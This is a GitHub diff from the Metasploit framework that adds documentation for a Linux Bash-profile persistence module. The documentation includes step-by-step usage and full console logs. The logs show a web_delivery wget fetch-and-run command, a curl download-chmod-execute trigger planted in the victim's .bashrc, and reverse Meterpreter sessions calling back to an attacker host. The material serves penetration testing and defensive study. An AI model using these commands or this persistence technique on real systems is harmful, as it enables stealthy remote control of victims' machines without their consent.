rapid7
diff --git a/‎documentation/modules/exploit/linux/local/bash_profile_persistence.md‎
Lines changed: 0 additions & 50 deletions b/‎documentation/modules/exploit/linux/local/bash_profile_persistence.md‎
Lines changed: 0 additions & 50 deletions
diff --git a/‎documentation/modules/exploit/linux/persistence/bash_profile.md‎
Lines changed: 111 additions & 0 deletions b/‎documentation/modules/exploit/linux/persistence/bash_profile.md‎
Lines changed: 111 additions & 0 deletions
diff --git a/‎modules/exploits/linux/local/bash_profile_persistence.rb‎
Lines changed: 0 additions & 122 deletions b/‎modules/exploits/linux/local/bash_profile_persistence.rb‎
Lines changed: 0 additions & 122 deletions
@@ -0,0 +1,111 @@
+## Vulnerable Application
+
+This module writes an execution trigger to the target's Bash profile.
+The execution trigger executes a call back payload whenever the target
+user opens a Bash terminal.
+
+Verified on Ubuntu 22.04 and 18.04 desktop with Gnome
+
+## Verification Steps
+
+1. Start `msfconsole`
+2. Get a Meterpreter session
+3. `use exploit/linux/local/bash_profile_persistence`
+4. `set SESSION [SESSION]`
+5. `run`
+6. On victim, open a new Bash terminal
+7. You should get a new session with the permissions of the exploited user account
+
+## Options
+
+### BASH_PROFILE
+
+The path to the target Bash profile. Defaults to `.bashrc`
+
+### PAYLOAD_NAME
+
+Name of the payload file. Defaults to random
+
+## Scenarios
+
+### Ubuntu 18.04.3
+
+Initial access vector via web delivery
+
+```
+[*] Processing /root/.msf4/msfconsole.rc for ERB directives.
+resource (/root/.msf4/msfconsole.rc)> setg verbose true
+verbose => true
+resource (/root/.msf4/msfconsole.rc)> setg lhost 111.111.1.111
+lhost => 111.111.1.111
+resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
+[*] Using configured payload python/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> set srvport 8181
+srvport => 8181
+resource (/root/.msf4/msfconsole.rc)> set target 7
+target => 7
+resource (/root/.msf4/msfconsole.rc)> set payload payload/linux/x64/meterpreter/reverse_tcp
+payload => linux/x64/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> set lport 4545
+lport => 4545
+resource (/root/.msf4/msfconsole.rc)> set URIPATH l
+URIPATH => l
+resource (/root/.msf4/msfconsole.rc)> run
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+[*] Starting persistent handler(s)...
+[*] Started reverse TCP handler on 111.111.1.111:4545 
+[*] Using URL: http://111.111.1.111:8181/l
+[*] Server started.
+[*] Run the following command on the target machine:
+wget -qO O2XZweCh --no-check-certificate http://111.111.1.111:8181/l; chmod +x O2XZweCh; ./O2XZweCh& disown
+[msf](Jobs:1 Agents:0) exploit(multi/script/web_delivery) > [*] 222.222.2.222    web_delivery - Delivering Payload (250 bytes)
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3045380 bytes) to 222.222.2.222
+[*] Meterpreter session 1 opened (111.111.1.111:4545 -> 222.222.2.222:44878) at 2025-02-06 21:11:39 -0500
+```
+
+Persistence
+
+```
+[msf](Jobs:1 Agents:1) exploit(multi/script/web_delivery) > use exploit/linux/persistence/bash_profile 
+[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
+[msf](Jobs:1 Agents:1) exploit(linux/persistence/bash_profile) > set session 1
+session => 1
+[msf](Jobs:1 Agents:1) exploit(linux/persistence/bash_profile) > exploit
+[*] Command to run on remote host: curl -so ./QfTygMjF http://111.111.1.111:8080/Hg3DGEu9GqlWD06kh4AzFg;chmod +x ./QfTygMjF;./QfTygMjF&
+[*] Exploit running as background job 1.
+[*] Exploit completed, but no session was created.
+[msf](Jobs:2 Agents:1) exploit(linux/persistence/bash_profile) > 
+[*] Fetch handler listening on 111.111.1.111:8080
+[*] HTTP server started
+[*] Adding resource /Hg3DGEu9GqlWD06kh4AzFg
+[*] Started reverse TCP handler on 111.111.1.111:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] Bash profile exists: /home/ubuntu/.bashrc
+[+] Bash profile is writable: /home/ubuntu/.bashrc
+[!] The service is running, but could not be validated. Bash profile exists and is writable: /home/ubuntu/.bashrc
+[*] Created backup Bash profile: /root/.msf4/loot/20250206211215_default_222.222.2.222_desktop..bashrc_080965.txt
+[*] Writing '/tmp/BfkldKp4' (100 bytes) ...
+[*] Created Bash profile persistence
+[+] Payload will be triggered when target opens a Bash terminal
+[*] Meterpreter-compatible Cleaup RC file: /root/.msf4/logs/persistence/ubuntu18desktop.local_20250206.1216/ubuntu18desktop.local_20250206.1216.rc
+```
+On the remote host open `/bin/bash`
+
+```
+[*] Client 222.222.2.222 requested /Hg3DGEu9GqlWD06kh4AzFg
+[*] Sending payload to 222.222.2.222 (curl/7.58.0)
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3045380 bytes) to 222.222.2.222
+[*] Meterpreter session 2 opened (111.111.1.111:4444 -> 222.222.2.222:40990) at 2025-02-06 21:12:21 -0500
+[msf](Jobs:2 Agents:2) exploit(linux/persistence/bash_profile) > sessions -i 2
+[*] Starting interaction with 2...
+(Meterpreter 2)(/tmp) > sysinfo
+Computer     : ubuntu18desktop.local
+OS           : Ubuntu 18.04 (Linux 5.4.0-150-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+(Meterpreter 2)(/tmp) > 
+```